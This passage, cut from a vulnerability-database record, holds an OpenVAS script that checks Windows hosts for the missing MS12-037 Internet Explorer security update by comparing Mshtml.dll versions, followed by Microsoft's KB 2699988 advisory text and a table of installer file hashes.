"CVE-2012-1877"], "description": "This host is missing a critical security update according to\n Microsoft Bulletin MS12-037.", "modified": "2020-06-09T00:00:00", "published": "2012-06-13T00:00:00", "id": "OPENVAS:1361412562310902682", "href": 
"http://plugins.openvas.org/nasl.php?oid=1361412562310902682", "type": "openvas", "title": "Microsoft Internet Explorer Multiple Vulnerabilities (2699988)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Internet Explorer Multiple Vulnerabilities (2699988)\n#\n# Authors:\n# Rachana Shetty <srachana@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2012 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.902682\");\n script_version(\"2020-06-09T10:15:40+0000\");\n script_cve_id(\"CVE-2012-1523\", \"CVE-2012-1858\", \"CVE-2012-1872\", \"CVE-2012-1873\",\n \"CVE-2012-1874\", \"CVE-2012-1875\", \"CVE-2012-1876\", \"CVE-2012-1877\",\n \"CVE-2012-1878\", \"CVE-2012-1879\", \"CVE-2012-1880\", \"CVE-2012-1881\",\n \"CVE-2012-1882\");\n script_bugtraq_id(53841, 53842, 53843, 53844, 53845, 53847, 53848, 53866,\n 53867, 53868, 53869, 53870, 53871);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-09 10:15:40 +0000 (Tue, 09 Jun 2020)\");\n script_tag(name:\"creation_date\", 
value:\"2012-06-13 09:16:32 +0530 (Wed, 13 Jun 2012)\");\n script_name(\"Microsoft Internet Explorer Multiple Vulnerabilities (2699988)\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2012 SecPod\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"gb_ms_ie_detect.nasl\");\n script_mandatory_keys(\"MS/IE/Version\");\n script_require_ports(139, 445);\n\n script_tag(name:\"impact\", value:\"Successful exploitation could allow remote attackers to gain sensitive\n information or execute arbitrary code in the context of the application.\");\n\n script_tag(name:\"affected\", value:\"Microsoft Internet Explorer version 6.x/7.x/8.x/9.x.\");\n\n script_tag(name:\"insight\", value:\"Multiple vulnerabilities are due to the way that Internet Explorer,\n\n - Handles content using specific strings when sanitizing HTML.\n\n - Handles EUC-JP character encoding.\n\n - Processes NULL bytes, which allows to disclose content from the process\n memory.\n\n - Accesses an object that has been deleted, which allows to corrupt memory\n using Internet Explorer Developer Toolbar.\n\n - Accesses an object that does not exist, when handling the 'Col' element.\n\n - Accesses an object that has been deleted, when handling Same ID Property,\n 'Title' element, 'OnBeforeDeactivate' event, 'insertRow' method and\n 'OnRowsInserted' event allows to corrupt memory.\n\n - Accesses an undefined memory location, when handling the\n 'insertAdjacentText' method allows to corrupt memory.\n\n - Handles 'Scrolling' event.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. 
Please see the references for more information.\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security update according to\n Microsoft Bulletin MS12-037.\");\n\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"http://support.microsoft.com/kb/2699988\");\n script_xref(name:\"URL\", value:\"http://www.securitytracker.com/id/1027147\");\n script_xref(name:\"URL\", value:\"http://www.securelist.com/en/advisories/49412\");\n script_xref(name:\"URL\", value:\"https://docs.microsoft.com/en-us/security-updates/securitybulletins/2012/ms12-037\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(xp:4, win2003:3, winVista:3, win2008:3, win7:2) <= 0){\n exit(0);\n}\n\nieVer = get_kb_item(\"MS/IE/Version\");\nif(!ieVer || ieVer !~ \"^[6-9]\\.\"){\n exit(0);\n}\n\nsysPath = smb_get_systemroot();\nif(!sysPath ){\n exit(0);\n}\n\ndllVer = fetch_file_version(sysPath:sysPath, file_name:\"system32\\Mshtml.dll\");\nif(!dllVer){\n exit(0);\n}\n\nif(hotfix_check_sp(xp:4) > 0)\n{\n if(version_in_range(version:dllVer, test_version:\"6.0.2900.0000\", test_version2:\"6.0.2900.6211\")||\n version_in_range(version:dllVer, test_version:\"7.0.0000.00000\", test_version2:\"7.0.6000.17109\")||\n version_in_range(version:dllVer, test_version:\"7.0.6000.20000\", test_version2:\"7.0.6000.21311\")||\n version_in_range(version:dllVer, test_version:\"8.0.6001.18000\", test_version2:\"8.0.6001.19257\")||\n version_in_range(version:dllVer, test_version:\"8.0.6001.20000\", test_version2:\"8.0.6001.23344\")){\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n }\n exit(0);\n}\n\nelse if(hotfix_check_sp(win2003:3) > 0)\n{\n if(version_in_range(version:dllVer, test_version:\"6.0.3790.0000\", test_version2:\"6.0.3790.4985\") ||\n 
version_in_range(version:dllVer, test_version:\"7.0.0000.00000\", test_version2:\"7.0.6000.17109\")||\n version_in_range(version:dllVer, test_version:\"7.0.6000.21000\", test_version2:\"7.0.6000.21311\")||\n version_in_range(version:dllVer, test_version:\"8.0.6001.18000\", test_version2:\"8.0.6001.19257\")||\n version_in_range(version:dllVer, test_version:\"8.0.6001.20000\", test_version2:\"8.0.6001.23344\")){\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n }\n exit(0);\n}\n\nelse if(hotfix_check_sp(winVista:3, win2008:3) > 0)\n{\n if(version_in_range(version:dllVer, test_version:\"7.0.6002.18000\", test_version2:\"7.0.6002.18615\")||\n version_in_range(version:dllVer, test_version:\"7.0.6002.22000\", test_version2:\"7.0.6002.22837\")||\n version_in_range(version:dllVer, test_version:\"8.0.6001.18000\", test_version2:\"8.0.6001.19271\")||\n version_in_range(version:dllVer, test_version:\"8.0.6001.20000\", test_version2:\"8.0.6001.23358\")||\n version_in_range(version:dllVer, test_version:\"9.0.8112.16000\", test_version2:\"9.0.8112.16445\")||\n version_in_range(version:dllVer, test_version:\"9.0.8112.20000\", test_version2:\"9.0.8112.20550\")){\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n }\n exit(0);\n}\n\nelse if(hotfix_check_sp(win7:2) > 0)\n{\n if(version_in_range(version:dllVer, test_version:\"8.0.7600.16000\", test_version2:\"8.0.7600.17005\")||\n version_in_range(version:dllVer, test_version:\"8.0.7600.20000\", test_version2:\"8.0.7600.21197\")||\n version_in_range(version:dllVer, test_version:\"8.0.7601.16000\", test_version2:\"8.0.7601.17823\")||\n version_in_range(version:dllVer, test_version:\"8.0.7601.21000\", test_version2:\"8.0.7601.21975\")||\n version_in_range(version:dllVer, test_version:\"9.0.8112.16000\", test_version2:\"9.0.8112.16445\")||\n version_in_range(version:dllVer, test_version:\"9.0.8112.20000\", test_version2:\"9.0.8112.20550\")){\n security_message( 
port: 0, data: \"The target host was found to be vulnerable\" );\n }\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "mskb": [{"lastseen": "2021-01-01T22:37:04", "bulletinFamily": "microsoft", "cvelist": ["CVE-2012-1876", "CVE-2012-1875", "CVE-2012-1880", "CVE-2012-1872", "CVE-2012-1881", "CVE-2012-1858", "CVE-2012-1878", "CVE-2012-1523", "CVE-2012-1882", "CVE-2012-1879", "CVE-2012-1874", "CVE-2012-1873", "CVE-2012-1877"], "description": "<html><body><p>Resolves vulnerabilities in Internet Explorer that could allow remote code execution if a user views a specially crafted webpage by using Internet Explorer.</p><h2></h2><div class=\"kb-notice-section section\">The update that this article describes has been replaced by a newer update. To resolve this problem, install the most current cumulative security update for Internet Explorer. To install the most current update, visit the following Microsoft website:<br/><div class=\"indent\"><a href=\"http://www.microsoft.com/technet/security/current.aspx\" id=\"kb-link-1\" target=\"_self\">http://www.microsoft.com/technet/security/current.aspx</a><a href=\"http://windowsupdate.microsoft.com\" id=\"kb-link-2\" target=\"_self\">http://windowsupdate.microsoft.com</a></div>For more technical information about the most current cumulative security update for Internet Explorer, visit the following Microsoft website:<br/><div class=\"indent\"><a href=\"http://technet.microsoft.com/security/bulletin\" id=\"kb-link-3\" target=\"_self\">http://technet.microsoft.com/security/bulletin</a></div></div><h2>INTRODUCTION</h2><div class=\"kb-summary-section section\">Microsoft has released security bulletin MS12-037. 
To view the complete security bulletin, visit one of the following Microsoft websites:<br/><ul class=\"sbody-free_list\"><li>Home users:<br/><div class=\"indent\"><a href=\"http://www.microsoft.com/security/pc-security/bulletins/201206.aspx\" id=\"kb-link-4\" target=\"_self\">http://www.microsoft.com/security/pc-security/bulletins/201206.aspx</a></div><span class=\"text-base\">Skip the details</span>: Download the updates for your home computer or laptop from the Microsoft Update website now:<br/><div class=\"indent\"><a href=\"http://update.microsoft.com/microsoftupdate/\" id=\"kb-link-5\" target=\"_self\">http://update.microsoft.com/microsoftupdate/</a></div></li><li>IT professionals:<br/><div class=\"indent\"><a href=\"http://technet.microsoft.com/security/bulletin/ms12-037\" id=\"kb-link-6\" target=\"_self\">http://technet.microsoft.com/security/bulletin/MS12-037</a></div></li></ul><h3 class=\"sbody-h3\">How to obtain help and support for this security update</h3>Help installing updates:<br/><a href=\"https://support.microsoft.com/ph/6527\" id=\"kb-link-7\" target=\"_self\">Support for Microsoft Update</a><br/><br/>Security solutions for IT professionals:<br/><a href=\"http://technet.microsoft.com/security/bb980617.aspx\" id=\"kb-link-8\" target=\"_self\">TechNet Security Troubleshooting and Support</a><br/><br/>Help protect your computer that is running Windows from viruses and malware:<br/><a href=\"https://support.microsoft.com/contactus/cu_sc_virsec_master\" id=\"kb-link-9\" target=\"_self\">Virus Solution and Security Center</a><br/><br/>Local support according to your country:<br/><a href=\"https://support.microsoft.com/common/international.aspx\" id=\"kb-link-10\" target=\"_self\">International Support</a><br/><br/></div><h2>More Information</h2><div class=\"kb-moreinformation-section section\"><h3 class=\"sbody-h3\">Known issues with this security update</h3><h3 class=\"sbody-h3\">Non-security-related fixes that are included in this security 
update</h3><h4 class=\"sbody-h4\">General distribution release (GDR) fixes</h4>Individual updates may not be installed, depending on the version of Windows and the version of the affected application. Please view the individual articles to determine your update status.<br/><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><td class=\"sbody-td\"><a href=\"https://support.microsoft.com/en-us/help/2696955\" id=\"kb-link-11\">2696955 </a></td><td class=\"sbody-td\">You cannot open a file whose file name is fully encoded when you use Internet Explorer 9 to browse the webpage that contains the file</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><a href=\"https://support.microsoft.com/en-us/help/2715453\" id=\"kb-link-12\">2715453 </a></td><td class=\"sbody-td\">The Save As dialog box may intermittently not be displayed when you try to download a file in Internet Explorer 9</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><a href=\"https://support.microsoft.com/en-us/help/2715815\" id=\"kb-link-13\">2715815 </a></td><td class=\"sbody-td\">The travel log is not updated when you post a form that is in a frame in Internet Explorer 9</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><a href=\"https://support.microsoft.com/en-us/help/2722090\" id=\"kb-link-14\">2722090 </a></td><td class=\"sbody-td\">Quotation marks in the name property of an HTML form are encoded with ASCII encoding two times during form submission in Internet Explorer 9</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><a href=\"https://support.microsoft.com/en-us/help/2718628\" id=\"kb-link-15\">2718628 </a></td><td class=\"sbody-td\">The display of a WebBrowser control may be partly erased when a menu item dropdown overlaps the control in Internet Explorer 9</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><a href=\"https://support.microsoft.com/en-us/help/2719319\" id=\"kb-link-16\">2719319 </a></td><td class=\"sbody-td\">Internet 
Explorer 8 shuts down when you browse through a proxy server to a webpage that uses protected mode and SSL</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><a href=\"https://support.microsoft.com/en-us/help/2695422\" id=\"kb-link-17\">2695422 </a></td><td class=\"sbody-td\">A memory leak may occur when a modal dialog box opens in an iframe in Internet Explorer 8 </td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><a href=\"https://support.microsoft.com/en-us/help/2695166\" id=\"kb-link-18\">2695166 </a></td><td class=\"sbody-td\">Cannot print a document in Internet Explorer 8 or Internet Explorer 9 after closing Print Preview by using the Close (red X) button </td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><a href=\"https://support.microsoft.com/en-us/help/2703157\" id=\"kb-link-19\">2703157 </a></td><td class=\"sbody-td\">Memory leak when an application calls the WinHttpGetProxyForUrl function on a Windows 7-based or Windows Server 2008 R2-based computer </td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><a href=\"https://support.microsoft.com/en-us/help/2722090\" id=\"kb-link-20\">2722090 </a></td><td class=\"sbody-td\">Quotation marks in the \"name\" property of an HTML form are encoded with ASCII encoding two times during form submission in Internet Explorer 9</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><a href=\"https://support.microsoft.com/en-us/help/2678934\" id=\"kb-link-21\">2678934 </a></td><td class=\"sbody-td\">Internet Explorer 9 shows a download bar for links that are targeted to an iframe </td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><a href=\"https://support.microsoft.com/en-us/help/2716900\" id=\"kb-link-22\">2716900 </a></td><td class=\"sbody-td\">A file that you opened in Internet Explorer 9 may be deleted when you click Cancel in the Internet Explorer Information bar </td></tr></table></div><h4 class=\"sbody-h4\">Hotfixes</h4>Security update 2699988 packages for Windows XP and for Windows Server 2003 
include Internet Explorer hotfix files and general distribution release (GDR) files. If no existing Internet Explorer files are from the hotfix environment, security update 2699988 installs the GDR files. <br/><br/>Hotfixes are intended to correct only the problems that are described in the Microsoft Knowledge Base articles that are associated with the hotfixes. Apply hotfixes only to systems that are experiencing these specific problems. <br/><br/>These hotfixes may receive additional testing. Therefore, if you are not severely affected by this problem, we recommend that you wait for the next service pack that contains these hotfixes. <span>For more information about how to install the hotfixes that are included in security update 2699988, click the following article number to view the article in the Microsoft Knowledge Base: <div class=\"indent\"><a href=\"https://support.microsoft.com/en-us/help/897225\" id=\"kb-link-23\">897225 </a>How to install hotfixes that are included in cumulative security updates for Internet Explorer </div></span><br/><span class=\"text-base\">Note</span>In addition to installing hotfix files, review the Microsoft Knowledge Base article that is associated with the specific hotfix that you have to install to determine the registry modification that is required to enable that specific hotfix. 
<br/><br/><span>For more information about how to determine whether your existing Internet Explorer files are from the hotfix or from the GDR environment, click the following article number to view the article in the Microsoft Knowledge Base: <div class=\"indent\"><a href=\"https://support.microsoft.com/en-us/help/824994\" id=\"kb-link-24\">824994 </a>Description of the contents of Windows XP Service Pack 2 and Windows Server 2003 software update packages </div></span></div><h2>FILE INFORMATION</h2><div class=\"kb-summary-section section\">For a list of files that are provided within these packages, click the following link: <br/><br/> <div class=\"indent\"><a href=\"http://download.microsoft.com/download/c/6/8/c68243cd-8b76-411f-a477-72f6a7e16c39/file attributes tables for security update 2699988.csv\" id=\"kb-link-26\" target=\"_self\">File attributes tables for security update 2699988.csv</a></div><h3 class=\"sbody-h3\">File hash table</h3>The following table lists the thumbprints of the certificates that are used to sign the security updates. 
Verify the certificate thumbprint in this KB article against the certificate thumbprint indicated on the security update that you download.<br/><br/><br/><br/><br/><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Publisher Filename</span></td><td class=\"sbody-td\"><span class=\"text-base\">Sha1</span></td><td class=\"sbody-td\"><span class=\"text-base\">SHA2</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsserver2003-kb2699988-x86-enu.exe</td><td class=\"sbody-td\">53324A0E42AEB5DE86E059613D33E3D13FB9686A</td><td class=\"sbody-td\">17C0FB2EF4644670ACB560A93BF79F3EF77A4F35F018498103611A8ADE84668C</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsserver2003-kb2699988-x86-ptb.exe</td><td class=\"sbody-td\">4B977D8EB3C2E8E366B0011A1E8ADE27C2DCA55E</td><td class=\"sbody-td\">B518113FFAE760022EE98680567F5F321C82D64E63DA83F56874CF140B3DE05C</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsserver2003-kb2699988-x86-hun.exe</td><td class=\"sbody-td\">76D37077F850532294329FF714C8A5E838CA5093</td><td class=\"sbody-td\">26F52454F97BE9BCDD52B992272D6820E62479EAEDA0F60D953C9EFF5FF55DE5</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsserver2003-kb2699988-x86-jpn.exe</td><td class=\"sbody-td\">4D8274EFA81B59715C5306154E7C538ADD69B73D</td><td class=\"sbody-td\">E121B54C84E14CF2380F909A65CEF47EEFD0F2F0DF420B8D776D688CA2316212</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsserver2003-kb2699988-x86-nld.exe</td><td class=\"sbody-td\">3FF5FB761EF680CBF5663EBC8526CF816B78A422</td><td class=\"sbody-td\">6651F5A15548DAB0B169DB00578AE46113254181FCDFB2B42F05C2FCBFDB6EF4</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsserver2003-kb2699988-x86-plk.exe</td><td class=\"sbody-td\">49271F1A17ECC761235C2CFCAA5BE7856B5C4043</td><td 
class=\"sbody-td\">92D40F9E72B15353730D3F3B2D0D3A2FD8D5D9EB88620285A4B8FFD6A6FDAAE8</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsserver2003-kb2699988-x86-ita.exe</td><td class=\"sbody-td\">C6DA0ABC4A614D26FF789F6671E075C48DB4E921</td><td class=\"sbody-td\">99B503BFD5A6D7FB57A9F29868832FA2B4D3A3581775BCE9CC6292C6C63E3B91</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsserver2003-kb2699988-x86-chs.exe</td><td class=\"sbody-td\">55D7DF59F4120882746EDE0C88AE18FA13E2656E</td><td class=\"sbody-td\">F5F6BC7C6B3CE82DF64235DA3A384896A8AD7850BBEB2BD2C9BD6F0A79135AF6</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsserver2003-kb2699988-x86-trk.exe</td><td class=\"sbody-td\">6341B3CC0D30E97C21F663EF2FF315461CF0D9F3</td><td class=\"sbody-td\">45E44ACD48E1BB1165D0429BB6DF6478C8286174972CD7E4A44FE8B97E0D81D4</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsserver2003-kb2699988-x86-rus.exe</td><td class=\"sbody-td\">C2DE6F6D9F0C946221A561DD747F06986F1F80C2</td><td class=\"sbody-td\">29164695BAAFC26E99BD4363787D71CEB26F28857C069F5DB4C28B68E628759B</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsserver2003-kb2699988-x86-sve.exe</td><td class=\"sbody-td\">BAEC609413E2B63036797B91DD83B3F846501AD1</td><td class=\"sbody-td\">895E73B1B7340D5F13AA9DE57A38E93B0473BFAC5623CF0962B0A9B066B0EBDC</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsserver2003-kb2699988-x86-esn.exe</td><td class=\"sbody-td\">520E5F469C55468D990C4A9B45B58E9E00B4FC5C</td><td class=\"sbody-td\">1207CA4DC0C093EF0792B54BFB4BF0FAAAFB9BC407C3F0EE412DF6C4F4A4504B</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsserver2003-kb2699988-x86-ptg.exe</td><td class=\"sbody-td\">D0E1CEDDBFFD8A10B5EBAC568BB72241364453BA</td><td class=\"sbody-td\">0AF5DBC61D454601A4F9AECB5D979993B541DAAE11090C6A2A1A61C45D202B5E</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsserver2003-kb2699988-x86-kor.exe</td><td 
class=\"sbody-td\">8D6B0D5B080328AC6D3ECADAC9524E1BDEDB9EE4</td><td class=\"sbody-td\">1855D9D549A714C38E29A6CA11798A1418A63AB4EB5B21D724D488C9E76D84F8</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsserver2003.windowsxp-kb2699988-x64-rus.exe</td><td class=\"sbody-td\">CCA5558F2076326C1BAC2F682C920911729F42CA</td><td class=\"sbody-td\">4D1617A49D63ADE567105AEAAE495D76C42DF5A43313652D19B2649B931F3997</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsserver2003.windowsxp-kb2699988-x64-esn.exe</td><td class=\"sbody-td\">4EADFE9DB4C9AFF061D1FB8B6395C9C3E8B49CB4</td><td class=\"sbody-td\">CFD65D5D8B88794FA5528E51F59211AC06B989A7E7E2C81A37FBC807FF29AE4E</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsserver2003.windowsxp-kb2699988-x64-kor.exe</td><td class=\"sbody-td\">CAA96AB4199B553A6CCF3417ECE6D21F08DC9BF6</td><td class=\"sbody-td\">2695A8C82629A82B181E2DC76363917F2E957D562B190A56D0A121696459338B</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsserver2003.windowsxp-kb2699988-x64-chs.exe</td><td class=\"sbody-td\">AB615DE8CE915281A6175C4927D5896F05C9E86E</td><td class=\"sbody-td\">18061A35C113484614F568B4C2E6958EDC0201D73837139C05EB11A206FE6949</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsserver2003.windowsxp-kb2699988-x64-ita.exe</td><td class=\"sbody-td\">201A560747B730990976382944DAB6024289A960</td><td class=\"sbody-td\">9C926085D6DE959C34C0AA3BAB934924CDFCF2FA609D3FAEE90572036743FD71</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie8-windowsserver2003-kb2699988-x86-nld.exe</td><td class=\"sbody-td\">D9291225462A9C95ECC24E4056A15A614425982D</td><td class=\"sbody-td\">FB9BC832EEA32D85188CC672F48F979C232A1126D7AB0294F470EDC0491BF4A9</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie8-windowsserver2003-kb2699988-x86-csy.exe</td><td class=\"sbody-td\">B0EDA1894F1C609437B4F43E82139F614B3E50B6</td><td 
class=\"sbody-td\">61A67DC529CE87B02BB7A3B7386CB2060DDCF5353F1A6692A3F66D4D84FADB3E</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie8-windowsserver2003-kb2699988-x86-ptb.exe</td><td class=\"sbody-td\">75E54D51D1BA4F1DBA1D82B74DDADF407C24DC9B</td><td class=\"sbody-td\">4B77C626DF204B1B6995197226815D09F760B037DD149F3EB8CA1B29FAD518A7</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie8-windowsserver2003-kb2699988-x86-fra.exe</td><td class=\"sbody-td\">F6127D77CADBA301CA658F7D28ADC0875E024234</td><td class=\"sbody-td\">7A89835EADEC0CBA1915B10D9D707E4C0AACD271E2A89CE54EA3CB1097FF64DE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie8-windowsserver2003-kb2699988-x86-deu.exe</td><td class=\"sbody-td\">324B4AD1ABFDCEE18641AA70D1AAB5E7419AC726</td><td class=\"sbody-td\">D8113983BBDAF953F1342C6933608F0993888BA64B83D60E70D85518696267C6</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie8-windowsserver2003-kb2699988-x86-jpn.exe</td><td class=\"sbody-td\">6E944314F86522FEF44579A173847D2FB3C83406</td><td class=\"sbody-td\">CB143BB175E08D970079451393D6A5F3FED82D553A5ED2EB3717A2382806E1F7</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie8-windowsserver2003-kb2699988-x86-plk.exe</td><td class=\"sbody-td\">BE74802AE609DFFD2460DE61F54926151514C355</td><td class=\"sbody-td\">EC1D553C7FFBFF24397482E513194FAF2A8C6BD7B44EBF92005FFFF04C6ED1A4</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie9-windows6.1-kb2699988-x86.msu</td><td class=\"sbody-td\">2820E2FD398378D2CF4B1EDDE7A086764438F7C2</td><td class=\"sbody-td\">E38929923CA479D817B0588EA62B325FF202F8F2524F3AA45145385F5AD4163D</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie9-windows6.0-kb2699988-x86.msu</td><td class=\"sbody-td\">620B26312E3485E2B536834A82BA8963917D2CF7</td><td class=\"sbody-td\">7D92920B0474676BEF0C5B05A665F096DDF2EBBFECB208F24803527EC73AE13C</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsxp-kb2699988-x86-custom-enu.exe</td><td 
class=\"sbody-td\">E6B4684880C31EC6AED099BBE078E3425398A94D</td><td class=\"sbody-td\">B5C7B8ABC841536571889F7F3A1FAE6E4354191273DC4A5084853FE675C4EC96</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsxp-kb2699988-x86-custom-ell.exe</td><td class=\"sbody-td\">96CB74D23D25963E4F2782339D5412A0E782B189</td><td class=\"sbody-td\">543620A6EDF7E960F2CEDF9302603308F59A32B2F11A1CA8835E91C62FC38433</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsxp-kb2699988-x86-custom-fra.exe</td><td class=\"sbody-td\">545987F11166DC04D0613D875A646DFEED9AB7D0</td><td class=\"sbody-td\">E77210B39D945DC9A38CC6900AE7EA2C82A8C92A70D65A9E857E7E315269EBAE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsxp-kb2699988-x86-custom-ara.exe</td><td class=\"sbody-td\">F4D0F87ABF38FBF275392A3C9748A36E2CE13934</td><td class=\"sbody-td\">22C0CAD9536F3B9FC49CB44F3E6FDFAB26719905940F8826A461D25131685346</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsxp-kb2699988-x86-custom-jpn.exe</td><td class=\"sbody-td\">56CFACA3F22B03B4F7A773A917CF999080276C77</td><td class=\"sbody-td\">CAF5FA8DC7161605CBC4908F568F77257E34C0236411D791F1E966815E01E81C</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsxp-kb2699988-x86-custom-deu.exe</td><td class=\"sbody-td\">35CF11BBC1A60606C2511904613F436FD05D269F</td><td class=\"sbody-td\">4D2E77852804C1DECB0EAD9367F1CDD4E485CA47B9F16767A3E04FA07AD558A8</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsxp-kb2699988-x86-custom-cht.exe</td><td class=\"sbody-td\">E120C08405EBC05D0552EF2C73DCC1854A72F739</td><td class=\"sbody-td\">F217F1013890839DDB8BE591D02DE0D906F073C341EF0B05C92CFDD30185C182</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsxp-kb2699988-x86-custom-chs.exe</td><td class=\"sbody-td\">931A16D0BE4EE89C23759B95BEC85AFC3CA3B50D</td><td class=\"sbody-td\">1340DCE0BF2C88009034801835EC4B5FAB0B983CBD50CEA1171A9043583FCF24</td></tr><tr class=\"sbody-tr\"><td 
class=\"sbody-td\">windowsxp-kb2699988-x86-custom-ptg.exe</td><td class=\"sbody-td\">82E6714C328D518A0FFC389FC5F0871A69368D5E</td><td class=\"sbody-td\">E3D03FF3C8FC90579FBBE1952C82C60838844DD5FB9B56C61F02A449B0E514D9</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsxp-kb2699988-x86-custom-trk.exe</td><td class=\"sbody-td\">77F654C7309DF235FD4F564F139FCB34D7B17440</td><td class=\"sbody-td\">7DB8389DB0D4E0BE1BF326E7520AB4FEF91F17F395E76B0F71BB9AF620039FFA</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsxp-kb2699988-x86-custom-kor.exe</td><td class=\"sbody-td\">11FB70381AEDCD7248CBF4D10384EB02516D2725</td><td class=\"sbody-td\">ABBE958725DC90FD8EAC57A8ACDB352C44147ED39FE9BD41B2082DAA548A6C0C</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsxp-kb2699988-x86-custom-dan.exe</td><td class=\"sbody-td\">1CCBA29C539D11940CDADB782A25438D3CA95812</td><td class=\"sbody-td\">3B71F651A417D30DD0568B6080FD1E4B66D30211BEC9EC6F24098F381F3607EA</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsxp-kb2699988-x86-custom-ptb.exe</td><td class=\"sbody-td\">B12214C90CDC27661538E758FD7CEE22A300DCE0</td><td class=\"sbody-td\">9E42CF3CEBF0E8E649031557E2447ADC831446FC282C1972FA7A62B7427C2D49</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsxp-kb2699988-x86-custom-fin.exe</td><td class=\"sbody-td\">F23281BE655B1BC3C7E6B73254578C9EACD7EAFB</td><td class=\"sbody-td\">E345EB64527650446802AE99A939F391B5B88CD8FA5CBAC25D5A605989928562</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsxp-kb2699988-x86-custom-sve.exe</td><td class=\"sbody-td\">E75AAC374D05F857F5F6A8A3883C8F94ABCB4706</td><td class=\"sbody-td\">98A1D235EB24F2744F2E91FEF3F391A3995B439B03C71888D10596EAD2E5BF7A</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsxp-kb2699988-x86-custom-csy.exe</td><td 